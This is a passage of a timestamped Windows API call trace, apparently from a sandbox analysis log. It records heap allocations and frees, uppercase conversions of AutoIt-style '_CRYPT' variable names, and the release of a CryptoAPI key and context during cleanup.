hHeap=0x970000) returned 1 [0134.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0134.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0134.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0134.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0134.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0134.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0134.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0134.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0134.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0134.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0134.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0134.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0134.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0134.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0134.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0134.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0134.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50860, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0134.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0134.083] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0134.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0134.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0134.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0134.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0134.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0134.083] CryptDestroyKey (hKey=0xa87610) returned 1 [0134.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0134.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0134.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0134.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0134.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0134.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0134.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0134.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0134.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0134.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0134.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0134.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0134.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0134.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0134.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0134.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0134.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0134.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0134.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0134.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0134.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0134.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0134.087] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0134.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0134.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0134.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0134.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0134.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0134.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0134.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0134.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0134.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0134.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0134.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0134.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0134.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0134.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0134.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0134.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0134.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0134.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0134.088] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0134.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0134.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0134.088] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0134.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0134.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0134.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0134.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0134.088] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0134.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0134.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0134.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0134.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0134.089] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0134.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0134.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0134.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0134.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0134.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0134.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0134.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0134.090] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0134.090] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0134.090] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0134.090] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0134.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0134.091] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0134.091] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0134.091] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0134.091] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0134.091] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0134.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0134.091] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0134.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0134.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0134.092] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0134.092] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0134.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0134.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.092] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0134.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0134.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0134.093] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.093] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0134.093] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.093] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0134.093] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0134.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0134.093] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0134.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0134.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0134.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0134.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0134.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: 